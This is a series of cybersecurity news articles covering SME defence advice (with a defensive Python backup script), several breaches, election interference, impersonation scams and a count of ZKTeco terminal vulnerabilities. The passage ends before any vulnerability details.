
Strengthening the Shield: Cybersecurity Strategies for SMEs

By: Alan J
17 June 2024 at 14:03


By: Abhilash R., Head of Cybersecurity at OQ Trading

In a progressively digital world, small and medium-sized enterprises (SMEs) are not immune to cyber threats. Despite their size, SMEs are prime targets for cyberattacks because of their limited resources and perceived vulnerability. Implementing robust cybersecurity strategies is therefore imperative to safeguard sensitive data, maintain customer trust, and ensure business continuity. This article covers five essential cybersecurity strategies tailored to SMEs, explains why each matters, and suggests cost-effective ways to implement them.

Employee Education and Training

One of the most critical cybersecurity strategies for SMEs is ensuring that employees are educated and trained in cybersecurity best practices. Human error remains a significant factor in cyber incidents, which makes awareness training indispensable. Employees should learn to recognize phishing attempts, create strong passwords, and understand why software updates matter.

Importance: Employees are the first line of defence against cyber threats, and they are also the weakest link. Educating them significantly reduces the risk of a successful attack.

Solutions: Run regular cybersecurity training sessions for all employees, covering topics such as identifying suspicious emails, safe browsing, and how to respond to a security incident. Use online training resources and phishing simulations to reinforce the learning. Internal awareness material can be developed with free or low-cost presentation tools such as Google Slides or Microsoft PowerPoint. Supplement this with free online resources such as cybersecurity blogs, webinars, and tutorials, and encourage participation in courses offered by reputable cybersecurity organizations, some of which are available at no cost.

Implementing Multi-Factor Authentication (MFA)

Multi-factor authentication (MFA) adds an extra layer of security by requiring users to present more than one form of verification before they can access sensitive data or systems. It mitigates the risk of unauthorized access even when a password has been compromised, because the attacker still lacks the second factor.

Importance: Passwords alone are no longer sufficient. MFA significantly strengthens authentication by requiring an additional factor, such as a one-time code from an authenticator app, a hardware token, or biometric data. Prioritize email, remote access (VPN), cloud administration consoles, and finance systems, and prefer app-based or hardware factors over SMS codes where the service offers them.

Solutions: Enable MFA on every account with access to sensitive information or critical systems. Many cloud services and software applications have built-in MFA, often at no additional cost, which makes roll-out straightforward and inexpensive. Open source MFA solutions can be customized to the organization's needs without licensing fees, and low-cost third-party MFA providers are another option; in either case, confirm compatibility with existing systems and that the solution will scale as the business grows.

Regular Data Backups

Data loss can have devastating consequences for SMEs, ranging from financial loss to reputational damage. Regular backups are essential for limiting the impact of ransomware, hardware failure, and accidental deletion.

Importance: Backups are the safety net that lets an SME recover quickly after an incident. Without them, a business risks permanent loss of valuable information.

Solutions: Automate regular backups of critical data to secure cloud storage or to offline storage devices, and keep at least one copy disconnected from the production network so that ransomware cannot reach it. Use backup software with versioning, so that data can be restored to a state from before the incident. Cloud-based backup services offer affordable storage and automated scheduling; free or low-cost backup software with basic features can back up critical data to cloud storage or external hard drives. Combine full and incremental backups to save storage space and shorten backup windows, and consider open source backup tools, which offer flexibility and customization without the cost of proprietary software. Finally, test restores on a schedule: a backup that has never been restored is unverified.
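As an added example, not code from the article or its author, here is a minimal versioned backup in Python that demonstrates the full-plus-incremental and versioning points above: every run records a complete manifest (a full snapshot) but copies only content the repository has not already stored (incremental), stored objects are write-once, and a restore is refused if any stored object fails its hash check. The repository layout, the sample files and the simulated ransomware overwrite in `demo()` are all constructed for this illustration; a real deployment would place the repository on storage that production machines cannot write to.

```python
import hashlib
import json
import shutil
import tempfile
from pathlib import Path

# Hypothetical repository layout used by this example:
#   <repo>/blobs/<sha256>        file content, stored once, read-only after writing
#   <repo>/snapshots/<id>.json   manifest for one backup run: relative path -> sha256


def _sha256_file(path: Path) -> str:
    """Stream a file through SHA-256 so large files need not fit in memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def backup(src, repo, snapshot_id: str) -> dict:
    """Record a full manifest of `src`; copy only content the repo does not already hold."""
    src, repo = Path(src), Path(repo)
    blobs, snaps = repo / "blobs", repo / "snapshots"
    blobs.mkdir(parents=True, exist_ok=True)
    snaps.mkdir(parents=True, exist_ok=True)
    manifest, new_blobs = {}, 0
    for path in sorted(p for p in src.rglob("*") if p.is_file()):
        digest = _sha256_file(path)
        blob = blobs / digest
        if not blob.exists():          # unchanged content is already stored: incremental
            shutil.copyfile(path, blob)
            blob.chmod(0o444)          # write-once: a later compromise cannot alter it in place
            new_blobs += 1
        manifest[path.relative_to(src).as_posix()] = digest
    (snaps / f"{snapshot_id}.json").write_text(json.dumps(manifest, sort_keys=True, indent=1))
    return {"snapshot": snapshot_id, "files": len(manifest), "new_blobs": new_blobs}


def verify_snapshot(repo, snapshot_id: str) -> list:
    """Return the relative paths whose stored content is missing or fails its hash check."""
    repo = Path(repo)
    manifest = json.loads((repo / "snapshots" / f"{snapshot_id}.json").read_text())
    return [rel for rel, digest in manifest.items()
            if not (repo / "blobs" / digest).exists()
            or _sha256_file(repo / "blobs" / digest) != digest]


def restore(repo, snapshot_id: str, dest) -> int:
    """Rebuild the tree exactly as it was at `snapshot_id`; refuse to restore damaged data."""
    damaged = verify_snapshot(repo, snapshot_id)
    if damaged:
        raise ValueError(f"snapshot {snapshot_id} has damaged files: {damaged}")
    repo, dest = Path(repo), Path(dest)
    manifest = json.loads((repo / "snapshots" / f"{snapshot_id}.json").read_text())
    for rel, digest in manifest.items():
        out = dest / rel
        out.parent.mkdir(parents=True, exist_ok=True)
        shutil.copyfile(repo / "blobs" / digest, out)
    return len(manifest)


def demo() -> dict:
    """Constructed scenario: two nightly snapshots, a ransomware-style overwrite of the
    live data, recovery from the last good snapshot, then loss of one stored object."""
    work = Path(tempfile.mkdtemp(prefix="backup-demo-"))
    src, repo, out = work / "data", work / "repo", work / "restored"
    (src / "invoices").mkdir(parents=True)
    (src / "invoices" / "2024-06.txt").write_bytes(b"invoice 1001: 250.00")
    (src / "customers.csv").write_bytes(b"id,name\n1,Alice\n")
    first = backup(src, repo, "2024-06-16")
    (src / "customers.csv").write_bytes(b"id,name\n1,Alice\n2,Bob\n")   # a normal edit
    second = backup(src, repo, "2024-06-17")
    for path in src.rglob("*"):
        if path.is_file():
            path.write_bytes(b"YOUR FILES ARE ENCRYPTED")               # simulated ransomware
    restored = restore(repo, "2024-06-17", out)
    customers = (out / "customers.csv").read_bytes()
    clean = verify_snapshot(repo, "2024-06-17")
    # Delete the object holding the newer customers.csv and confirm the check catches it.
    (repo / "blobs" / hashlib.sha256(b"id,name\n1,Alice\n2,Bob\n").hexdigest()).unlink()
    damaged = verify_snapshot(repo, "2024-06-17")
    try:
        restore(repo, "2024-06-17", work / "restored-again")
        refused = False
    except ValueError:
        refused = True
    older_ok = verify_snapshot(repo, "2024-06-16") == []
    shutil.rmtree(work)
    return {"first": first, "second": second, "restored_files": restored,
            "customers_after_restore": customers, "verify_clean": clean,
            "damaged": damaged, "refused": refused, "older_snapshot_ok": older_ok}


if __name__ == "__main__":
    print(json.dumps({k: (v.decode() if isinstance(v, bytes) else v)
                      for k, v in demo().items()}, indent=1))
```

Two properties carry the recovery: the encrypted files are never written into the repository (no backup ran after the overwrite in this scenario, and even if one had, earlier manifests and their blobs are untouched), and `restore` verifies every object before writing anything, so a damaged backup is detected at restore time rather than discovered half-way through a recovery.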

Network Security Measures

Securing the network infrastructure is crucial for protecting against external threats and unauthorized access. SMEs should deploy firewalls, intrusion detection systems (IDS), and virtual private networks (VPNs).

Importance: Networks are prime targets for attackers, so network security controls are essential for preventing unauthorized access and data breaches.

Solutions: Deploy firewalls to monitor and control incoming and outgoing traffic, and configure them to deny by default and allow only the services the business needs. Use an IDS to detect suspicious activity inside the network and raise alerts that someone actually reviews. Use VPNs to encrypt data in transit and give remote workers a secure path into the network. Open source firewalls provide robust protection without the price of commercial appliances; free or low-cost IDS software offers the essential real-time monitoring and threat detection features; and subscription-based VPN services with affordable pricing and simple deployment suit remote SME workforces.

Regular Security Assessments and Updates

Cyber threats evolve constantly, so SMEs must stay vigilant and proactive. Regular security assessments and timely updates identify vulnerabilities and keep systems and software current with the latest security patches.

Importance: Because threats keep changing, regular assessments and updates are essential for maintaining a strong security posture.

Solutions: Conduct regular security assessments to identify vulnerabilities in systems, networks, and applications. Develop a patch management process that applies software and firmware updates promptly. Internal assessments can use free or low-cost vulnerability scanners, and open source penetration testing frameworks can simulate attacks to test whether existing controls hold. Apply patches systematically, using the free update tools provided by software vendors or community projects, and establish an internal process for monitoring security advisories and alerts from relevant authorities so that emerging threats and vulnerabilities are acted on quickly.

In conclusion, cybersecurity is a critical concern for SMEs in today's digital landscape. By implementing the strategies above, SMEs can significantly improve their security posture without breaking the bank. Investing in cybersecurity protects sensitive data and day-to-day operations, and it safeguards the long-term viability and reputation of the business in an increasingly interconnected world.

About the Author: Abhilash Radhadevi, a seasoned cybersecurity leader, serves as Head of Cybersecurity at OQ Trading, bringing over two decades of experience in the banking, financial, oil and energy sectors. Widely recognized for his leadership, Abhilash has steered international organizations through intricate security challenges. His career includes spearheading pioneering cybersecurity strategies that have earned awards and acclaim. Beyond his professional achievements, he maintains a global influence and is committed to mentoring, helping to shape the future of cybersecurity.

Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

Understanding Cyberconflict in the Geopolitical Context

By: Alan J
17 June 2024 at 14:00


By Hoda Alkhzaimi

The technological prowess of small nations is increasingly recognized as a significant driver of global economic power, because technology is a great equalizer: it can enable small nations to leapfrog development stages and compete on a global scale. For instance, the UNCTAD Technology and Innovation Report 2021 highlights that frontier technologies like AI, robotics, and biotechnology have the potential to significantly boost sustainable development, while also posing the risk of widening the digital divide. Small nations that embrace these technologies can foster innovation, improve productivity, and create high-value industries that contribute to global trade and economic growth. Digital transformation also democratizes information and resources, enabling smaller economies to participate in markets traditionally dominated by larger countries. The OECD likewise emphasizes the role of SMEs in adapting to a more open and digitalized environment, which is essential for inclusive globalization. The technological development of small nations is therefore not just about national progress; it is about contributing to and shaping the global economic landscape. By investing in technology and innovation, small nations can assert their presence on the world stage, influencing global trends and economic policies.

Cyber conflicts have emerged as a significant factor in international relations, influencing the dynamics of power in the digital age. The Atlantic Council's Cyber Statecraft Initiative highlights the shift from traditional deterrence strategies to more proactive postures such as Defend Forward and Persistent Engagement, reflecting the evolving nature of cyber threats. Research published in Armed Forces & Society suggests that cyber conflicts, termed 'cool wars', are reshaping interactions between states, with denial-of-service attacks and behaviour-changing tactics significantly affecting state relations.

Moreover, the ICRC has raised concerns about the protection of civilians from cyber threats during armed conflicts, emphasizing the need for legal and policy frameworks to address the digital risks in warfare. The CyberPeace Institute's analysis of cyberattacks in the context of the Ukraine conflict provides valuable data on the harm to civilians and the evolution of cyber threats, and the European Repository of Cyber Incidents offers an extensive database of cyber incidents that can serve as a resource for understanding the scope and impact of cyber warfare. These insights underscore the importance of cyber capabilities in asserting influence and the need for robust cyber defence mechanisms to safeguard national security and civilian welfare in the face of digital threats. The interplay between cyber operations and political power is complex, and as technology continues to advance, the implications for international stability and power hierarchies will likely become even more pronounced.

The Role of Misinformation and Disinformation in Cyberconflict

Misinformation and disinformation play a critical role in the landscape of cyberconflict, shaping public perception and influencing the dynamics of geopolitical tensions. A report by Full Fact highlights the detrimental impact of false information on democratic societies, emphasizing the need for informed citizenship to combat the spread of such information. Similarly, data from UNESCO underscores the pervasive risk of encountering disinformation across various media platforms, with statistics indicating a significant trust deficit in media and an increase in the manipulation of news consumption. The cybersecurity sector also recognizes disinformation as a substantial threat, with a study by the Institute for Public Relations revealing that 63% of Americans view disinformation as a major societal issue, and nearly half of cybersecurity professionals consider it a significant threat to security. These concerns are echoed globally, as a survey found that over 85% of people worry about the impact of online disinformation on their country's politics. The intertwining of misinformation, disinformation, and cyberconflict presents a complex challenge that requires a multifaceted approach, including media literacy, regulatory frameworks, and international cooperation to mitigate its effects and safeguard information integrity.

The Role of Big Tech in Cyberconflict Interplay

The role of big tech companies in cyber conflict is a complex and evolving issue. These companies often find themselves at the forefront of cyber conflict, whether as targets, mediators, or sometimes even participants. For instance, during civil conflicts, digital technologies have been used to recruit followers, finance activities, and control narratives, posing additional challenges for peacemakers. The explosive growth of digital technologies has also opened new potential domains for conflict, with state and non-state actors capable of carrying out attacks across international borders, affecting critical infrastructure and diminishing trust among states. In response to the invasion of Ukraine, big tech companies played crucial roles in addressing information warfare and cyber-attacks, showcasing their significant influence during times of conflict. Moreover, the technological competition between major powers like the United States and China further highlights the geopolitical dimension of big tech's involvement in cyber conflict. These instances underscore the need for a robust framework to manage the participation of big tech in cyber conflict, ensuring that their capabilities are harnessed for peace and security rather than exacerbating tensions.

Hedging the Risks of Using AI and Emerging Tech To Scaleup Misinformation and Global Cyberconflicts

In response to the growing threat of election misinformation, various initiatives have been undertaken globally. The World Economic Forum has identified misinformation as a top societal threat and emphasized the need for a concerted effort to combat it, especially in an election year in which a significant share of the global population goes to the polls. The European Union has implemented a voluntary code of practice under which online platforms take proactive measures against disinformation, including the establishment of a Rapid Alert System and the promotion of fact-checking and media literacy programs. In the United States, the Brennan Center for Justice advocates active monitoring of false election information and collaboration with internet companies to curb digital disinformation. Additionally, the North Carolina State Board of Elections (NCSBE) provides guidelines for the public on critically assessing the credibility of election news sources and encourages the use of reputable outlets. These initiatives represent a multifaceted approach to safeguarding the integrity of elections by enhancing public awareness, improving digital literacy, and fostering collaboration between governments, tech companies, and civil society.

In the ongoing battle against election misinformation, several key alliances and actions have been formed. Notably, the AI Elections Accord was proposed for public signature at the Munich Security Conference on February 16, 2024; it represents a commitment by technology companies to combat deceptive AI content in elections. In a similar vein, Meta established a dedicated team on February 26, 2024, to address disinformation and the misuse of AI in the run-up to the European Parliament elections. Furthermore, the Federal Communications Commission (FCC) in the United States took a decisive step on February 8, 2024, by making AI-generated voices in robocalls illegal, to prevent their use in misleading voters. These measures reflect a growing recognition of the need for collaborative efforts to safeguard the integrity of elections in the digital age. The alliances and regulations are pivotal in ensuring that the democratic process remains transparent and trustworthy amidst the challenges posed by advanced technologies.

Globe Life Discloses Breach Amid Accusations of Fraud and Shady Business Tactics

By: Alan J
14 June 2024 at 18:02


Globe Life disclosed a recent cybersecurity incident that may have resulted in unauthorized access to its consumer and policyholder information. Globe Life is a Texas-based insurance holding company. It offers life, health, and worksite insurance products and services to consumers nationwide through its subsidiaries. The company has over 3,600 employees and also owns several insurance providers like Liberty National, United American and Family Heritage Life. The company had also been accused of shady financial tactics and business operations by short sellers Fuzzy Panda Research and Viceroy Research, allegations the company has denied.

Globe Life Breach Discovery and Containment

According to Globe Life's filing with the SEC, the company conducted a security review of one of its web portals after a legal inquiry from a state insurance regulator on June 13, 2024, looking for vulnerabilities affecting the portal's access permissions and user identity management. The review revealed that an unauthorized party may have accessed the portal, compromising sensitive customer and policyholder data. The company said it immediately revoked external access to the affected portal on discovering the breach. Globe Life believes that, at this stage, the issue is isolated to that one portal; all other company systems remain fully operational, and it expects minimal impact on business operations from taking the portal down. The company has activated its cybersecurity incident response plan and engaged external forensics experts to determine the scope of the breach. In its SEC filing, Globe Life said the investigation remains ongoing and that the full nature and impact of the incident are not yet known.

Incident Comes After Scrutiny Over Business Tactics

The company said it has yet to determine whether the breach qualifies as a reportable cybersecurity incident under the SEC's disclosure rules. The disclosure comes amid increasing scrutiny and financial setbacks for the company. The Texas-based insurer has faced allegations of fraudulent sales tactics and other business and workplace improprieties, which the short sellers Fuzzy Panda Research and Viceroy Research made public in April 2024. While the company has continued to deny these claims, its share price has dropped by 24% since the publication of the Fuzzy Panda report. The reports claimed that Globe Life and its biggest subsidiary, American Income Life (AIL), had engaged in insurance fraud, written policies in the names of dead and fictitious individuals, withdrawn consumer funds without approval, dismissed employees unfairly, used misleading sales tactics and paid illegal kickbacks. They also alleged that some of AIL's most profitable agents had faced accusations of kidnapping, assault and child grooming from defendants, witnesses and plaintiffs. It remains unclear whether the state insurance regulator's inquiry that led to the breach discovery is related to these allegations. Insurers like Globe Life are regulated at the state level rather than the federal level.

UK, US and Canada Accuse Russia of Plot to Interfere With Elections in Moldova

By: Alan J
14 June 2024 at 16:22


The UK, US and Canada have accused Russia of an elaborate plot to interfere in Moldova’s upcoming presidential election and referendum on EU membership. The allegations came in a joint statement released on the opening day of the G7 summit, pointing to a far-reaching campaign of political meddling by Moscow. The three nations claim Russia is actively spreading disinformation to 'undermine Moldovan democratic institutions' and 'degrade public confidence' in the government ahead of the votes on October 20th. Specific targets include President Maia Sandu and her pro-Western administration, which has strongly backed Ukraine in the Russia-Ukraine conflict.

Kremlin Actors Seeking to Discredit Moldova's Leaders

According to a statement from the U.S. Embassy in Russia, Russian threat actors are aggressively distributing propaganda to "foment negative public perceptions" of President Sandu. This involves fabricating claims of electoral irregularities while also aiming to incite protests if the incumbent president is re-elected. The plot dates back years, with the Kremlin providing support to fugitive Moldovan businessman Ilan Shor. Shor had previously been sentenced to 15 years in prison in connection with the disappearance of $1 billion from Moldovan banks in 2014, and all three countries have sanctioned him over his connection to that affair. The statement singled out Russian state television channel RT for providing several years of support to Shor. The UK, US and Canada say they have already shared detailed evidence with Moldovan authorities to enable further investigation and disruption, and that they will continue backing Moldova with a range of support measures as it deals with Russian interference and the fallout from the Ukraine war.

All Three Countries Announce Support at G7 Summit

The three nations expressed confidence in Moldova's ability to manage these threats linked to Russian interference. They have taken several measures to support Moldova's efforts, including:
  • The sharing of detailed information with Moldovan partners to investigate, thwart, and put a stop to the Kremlin's plans.
  • Increasing accountability and punishment for individuals and entities involved in covertly financing political activities in Moldova through sanctions and potential further actions.
  • Strongly supporting Moldova's democratic, economic, security, and anti-corruption reforms, as well as its deepening European integration.
The three nations affirmed their support for deepening ties between Moldova and the EU. President Sandu has been widely perceived as a firmly pro-Ukrainian and pro-Western leader since her election in 2020, and the Kremlin appears intent on preventing her re-election in order to install a more Russia-friendly president. By publicizing the interference plot, the Western allies hope to deter Moscow while urging respect for Moldovan sovereignty and free, fair elections. However, with under five months until the votes, concerns remain high over Russia's determination to influence the result. "We will continue to stand with all of our friends, partners, and Allies in defense of our shared democratic values and freedoms," the statement read. The U.S. embassy's statement also highlighted the broader threat to elections in 2024, a year in which "hundreds of millions of people across Europe and North America go to the polls to select their leaders in European, national, regional, and local elections."

Russia Is a Threat to Election Security: Researchers

An earlier report from Mandiant in April suggested that Russia presented the biggest threat to election security in the United States, United Kingdom and European Union. "Multiple Russian groups have targeted past elections in the U.S., France, and Ukraine, and these groups have continued to demonstrate the capability and intent to target elections both directly and indirectly," the report stated. Experts also fear Russian attempts to spread disinformation or influence public opinion around non-election events such as the upcoming 2024 Summer Olympics in Paris.

Fraudsters Have Been Creating Websites Impersonating the Official Olympics Ticketing Website

By: Alan J
14 June 2024 at 13:01


As anticipation builds for the Paris 2024 Summer Olympic Games, security researchers and officials have observed an uptick in scams abusing legitimate Olympics branding. French Gendarmerie officials have discovered over 300 bogus ticketing sites that aim to steal money and personal information from people in a hurry to book tickets for the events. Recent research from Proofpoint examined a prominent example, paris24tickets[.]com, which appeared among the top paid results in Google searches and promoted itself as a secondary marketplace for sports and live events tickets.

Website Incorporates Official Paris 2024 Summer Olympic Games Branding

The 'paris24tickets[.]com' website appeared professional and legitimate at first glance. It advertised itself as a "secondary marketplace for sports and live events tickets" and was displayed as the second result among sponsored Google search results for 'paris 2024 tickets.' Visitors could browse upcoming Olympic events, select tickets for a specific event, and enter payment information. Its polished design resembled that of trusted ticketing platforms and of the official Olympics ticket purchase site. Proofpoint researchers warned that the website was entirely fraudulent despite its authentic look and feel: it was most likely harvesting users' financial and personal information rather than processing ticket orders. The researchers acted swiftly to have the misleading domain suspended once they discovered it.

[Figure: Impersonating domain 'paris24tickets[.]com' (Source: archive.org)]

[Figure: Official Olympics ticketing site (Source: https://tickets.paris2024.org)]

The researchers noticed that in some cases the scammers also sent emails promising "discounts" on coveted tickets, a lure aimed at people desperate to secure tickets at lower prices. Victims who entered personal or financial information on the fraudulent website risk identity theft and financial loss; the scammers may also collect names, contact information and card details for resale or for further malicious campaigns.

French Gendarmerie Nationale Reported the Discovery of 338 Scam Sites

The 'paris24tickets[.]com' website represents just a tiny fraction of a much broader network of fraudulent Olympics domains. The French Gendarmerie Nationale has identified approximately 338 such websites since March 2023 and has worked to shut them down; 51 of the sites were reported closed and 140 put on notice. The fraudsters behind these scams rely on sponsored search engine ads and targeted emails to drive traffic to impersonating websites, with offers of special deals and discounts as further lures.

[Figure: French Gendarmerie Nationale (Source: Shutterstock)]

A unit of 200 French gendarmes has been mobilized to monitor the internet and social networks for Olympics ticketing fraud and mass resales, working under the direction of Europol and alongside the DGCCRF (Directorate General for Consumer Affairs, Competition and Fraud Prevention). Captain Etienne Lestrelin, director of operations at the unit, told France Info radio that social media such as Facebook, Leboncoin, Telegram and Instagram were often "the primary source of resale attempts." He added, "This is an exchange from individual to individual. Except that the buyer does not know if the person really owns the tickets, since they are virtual tickets, not paper tickets. So people are selling you wind; we don't know what they're selling."

Lestrelin advised that a ticket offered at too low a price should itself alert potential buyers: "You will never have a ticket below its original cost. The goal of people who were able to buy tickets in volume with the intention of reselling them is to make a profit. So it is an alert if you find a much cheaper ticket. The sentence to remember is that there are no very good deals on the internet; it's not possible."

He also explained that it is not possible to own a ticket before the event begins and the QR codes are generated: anyone who claims to be currently in possession of a ticket, or shows tickets that look legitimate, is still a fraudster. He warned buyers to be vigilant about buying tickets outside official sources, because doing so can itself be an offence: "You are associating yourself with the offence that the seller commits when he resells without going through the official website. This is a criminal offence." To validate a purchase, buyers can cross-check the references provided against the official Paris 2024 Summer Olympic Games application. Buyers who suspect they have been duped can report to a police station, a gendarmerie or the DGCCRF. Legitimate tickets can be bought through the official ticketing website or the official sub-distributor network.

Baw Baw Shire Residents Impacted By OracleCMS Breach That Hit Several Major Cities in Australia

By: Alan J
13 June 2024 at 18:13


A significant data breach has exposed the private information of more than 1,200 Baw Baw Shire residents who contacted customer service after-hours over a nearly two-year period, the Baw Baw Shire council revealed. The breach occurred at OracleCMS, a third-party call center contracted by the council to field inquiries outside normal business hours. It reportedly does not impact the council's own systems and databases.

Over 1,200 Baw Baw Shire Residents Affected

The exposed information includes customer contact details and call notes dating from June 2014 to January 2016, when customers rang the council hotline during evenings, weekends and holidays. Calls made during that period were automatically forwarded to OracleCMS call agents. It remains unclear precisely how the contractor failed to protect the information or when the company first discovered the breach. On learning of the breach earlier this month, Baw Baw officials urgently contacted every affected resident, over 1,250 in total, by SMS and, for vulnerable groups such as the elderly, by personal phone call. While the breach did not reach the council's own systems, it represents an alarming security gap at a third-party vendor that had been given access to constituents' sensitive information.

OracleCMS Provider Implicated in Other Breaches

Authorities are currently investigating the incident, which may also have affected other clients of the Australia-based company. OracleCMS provides outsourced contact center services for an array of local governments and organizations, and had previously been implicated in a string of data breaches affecting several cities in Australia. Judging by official statements from affected councils, OracleCMS appears to have initially downplayed the incident. An earlier release from Merri-bek City Council stated:
OracleCMS informed Council in April that there had been a cyber security incident where identifiable information of customers had been compromised. Until last week we were informed that Council's customer data was not involved. Council has now been informed that the OracleCMS data breach does include records of calls handled by OracleCMS on Council's behalf. We take the privacy of our customers very seriously and we are taking urgent action to address this issue.
The OracleCMS data breach also affected businesses, including several Nissan entities in the Australia and New Zealand region: Nissan Financial Services Australia Pty Ltd, Nissan Motor Co. Pty Ltd, Nissan Financial Services New Zealand Pty Ltd and Nissan New Zealand Ltd.
OracleCMS subsequently suffered a data breach, which it was alerted to on 15 April 2024. This separate incident resulted in certain data which was held by OracleCMS, including the summary information Nissan provided to OracleCMS, being compromised and published on the dark web.
As cyberattacks surge, some have questioned whether outsourcing critical customer service channels leaves individuals and businesses more exposed to data theft. The incident is a reminder for governments and organizations to address weaknesses in third-party vendors and tools and to audit them regularly. Residents with concerns about the breach may contact Baw Baw Shire Council's customer service line at +61 3 5624 2411. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

Canada’s Largest District School Board Investigates Ransomware Incident

By: Alan J
13 June 2024 at 16:18

Toronto District School Board Ransomware Canada

The Toronto District School Board is investigating a recent ransomware attack that affected its testing environment. The board is Canada's largest school board, serving approximately 238,000 students across 600 schools in the city of Toronto. It stated that it had taken immediate action and launched an investigation upon becoming aware of a possible intrusion.

Toronto District School Board's Investigation Underway

The school board stated that the incident had affected its testing environment, which is used to evaluate new technology and programs before they are deployed on production systems. The board's cybersecurity team took immediate action upon discovering the incident, securing systems and preserving data, and the board notified the Toronto Police and the Information and Privacy Commissioner of Ontario of the incident.
(Image: Toronto District School Board notice on the cyberattack. Source: www.tdsb.on.ca)
In its letter of notification to parents and guardians, the Toronto District School Board stated that it had launched an investigation with the aid of third-party experts to fully assess the nature and scope of the incident, including any potential compromise of its networks or breach of sensitive personal information.
(Image: Toronto District School Board letter to parents and guardians. Source: www.tdsb.on.ca)
The letter added, "If it is determined that any personal information has been impacted, we will provide notice to all affected individuals. We understand that news of a cyber incident is concerning, but please know that we are doing everything possible to learn more about what occurred and address this situation."

Impact Unknown; More Details Expected Soon

Despite the attack, the school board's systems remained fully operational. While only the testing environment was affected, Humber College cybersecurity expert Francis Syms remained concerned about the incident, as personal information is sometimes used in test environments. He added that test environments are usually not protected by multifactor authentication, potentially making their data easier to access, though he acknowledged that he did not know which testing system was involved, as he was not part of the investigation team. The Toronto District School Board did not clarify whether the testing environment or its data contained any personal information. Ryan Bird, a spokesperson for the board, told CityNews Toronto that the full extent of the breach, and whether any personal data had been compromised, was not yet known, but that further details would be released by the end of the day. The Cyber Express has reached out to the Toronto District School Board for further details and investigation results, but has received no response as of yet. Toronto's cybersecurity defenders have observed an uptick in cyberattacks in recent years, from both financially motivated hackers and 'hacktivists' disrupting public systems. Some attacks occur at sensitive times such as elections, global conflicts, or visits by foreign leaders; ransomware, however, remains the most common form of attack. City officials have been working with several agencies to rebuild trust in the safety of public systems and services.
Charles Finlay, Toronto resident and executive director at Rogers Cybersecure Catalyst, had earlier told the Toronto Star, "I think the city has to be more forthcoming about what it is doing to ensure that those services are secure from cyber-attacks." The city has seen several attacks on its public institutions, including a Cl0p ransomware intrusion into the City of Toronto's computer systems and an attack last year on the Toronto Public Library's computer systems.

CISA Warns of Phone Scammers Impersonating Its Employees

By: Alan J
13 June 2024 at 12:39

CISA Impersonation Scam

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued an alert about a recent impersonation scam in which fraudsters pose as its representatives and employees. The scammers attempt to extort money in various forms, including bank transfers, gift cards and cryptocurrency payments.

CISA Impersonation Scam

The scammers behind the campaign phone victims claiming to be contacting them on behalf of CISA, then ask them to share personal information or money under the guise of protecting their accounts from unauthorized activity. They may also direct victims to download software or click on links to "verify" their identity. CISA confirmed that it would never make such demands: "CISA staff will never contact you with a request to wire money, cash, cryptocurrency, or use gift cards and will never instruct you to keep the discussion secret," the agency warned. Possible red flags to watch out for:
  • Unsolicited phone calls that claim to be from CISA.
  • Callers requesting personal information, such as passwords, social security numbers, or financial information.
  • Callers demanding payment or transfer of money to "protect" your account.
  • Callers creating a sense of urgency or pressuring you to take immediate action.
If you're targeted by a CISA impersonation scam, here's what you should do:
  • Do not pay the caller.
  • Take note of the numbers used.
  • Hang up immediately and ignore further calls from suspicious numbers.
  • Report the scam to CISA by calling (844) SAY-CISA (844-729-2472).

FTC Observes Uptick in Impersonation Scams

The CISA impersonation scam is a recent example of the rise in impersonation fraud targeting both businesses and government agencies. According to the latest data from the Federal Trade Commission (FTC), such scams have increased dramatically in recent years and cost consumers more than $1.1 billion in 2023 alone. The FTC reported receiving more than 330,000 reports of business impersonation fraud and almost 160,000 reports of government impersonation fraud in 2023; together these account for almost half of all fraud cases reported directly to the FTC. "The financial injury is breath-taking – and cash-taking," the FTC quipped in its Spotlight report, adding, "Reported losses to impersonation scams topped $1.1 billion in 2023, more than three times what consumers reported in 2020." While fraudsters employ many variations, the FTC noted that the following five accounted for nearly half of the impersonation scams reported in 2023:
  1. Copycat account security alerts: messages that impersonate legitimate services such as Amazon while purporting to be about unauthorized activity or charges on the target's account.
  2. Phony subscription renewals: usually email notices alerting targets to auto-renew charges for various online services.
  3. Fake giveaways, discounts, or money to claim: fake rewards or winnings that claim to come from legitimate providers such as internet providers or large retailers.
  4. Bogus problems with the law: scammers try to convince targets that their identity has been used to commit serious crimes such as money laundering or drug smuggling.
  5. Made-up package delivery problems: messages alerting you to fake delivery problems with legitimate carriers such as the U.S. Postal Service, UPS, or FedEx.
To avoid such scams, the FTC advises consumers not to click on unexpected links or messages, to be wary of anyone who says a problem can be fixed by paying with gift cards, and to scrutinize urgent offers and claims.

Researchers Discovered 24 Vulnerabilities in ZKTeco Biometric Terminals Used In Nuclear Plants

By: Alan J
12 June 2024 at 17:30

24 Vulnerabilities in ZKTeco Biometric Terminals

Kaspersky researchers have discovered widespread vulnerabilities in biometric terminals developed by ZKTeco, which are deployed internationally. The flaws could be exploited by threat actors to bypass authentication, steal sensitive data, and even gain full control over affected terminals. The vulnerabilities pose a major risk because these terminals are often white-labeled and sold under various brand names by multiple distributors, and because they are widely used in high-security environments such as nuclear power plants, chemical plants and hospitals, where a single device may store thousands of facial templates.

Vulnerabilities in ZKTeco Biometric Terminals

Biometric terminals serve multiple purposes beyond acquiring biometric data such as fingerprints, voices, facial features, or irises. They can be connected to other scanners to support alternative authentication methods, or be deployed to monitor employee productivity or reduce fraud. These devices are increasingly used in sensitive facilities such as power plants, executive suites and server rooms. The ZKTeco terminals support facial recognition (with the ability to store thousands of face templates), password entry, electronic passes, and QR codes. The researchers conducted several tests to assess the security and reliability of these devices, finding 24 vulnerabilities that threat actors could exploit in real attacks on sensitive facilities:
  • 6 SQL injection vulnerabilities
  • 7 stack-based buffer overflow vulnerabilities
  • 5 command injection vulnerabilities
  • 4 arbitrary file write vulnerabilities
  • 2 arbitrary file read vulnerabilities
The researchers grouped some of the more critical vulnerabilities present in these devices by their attack type:
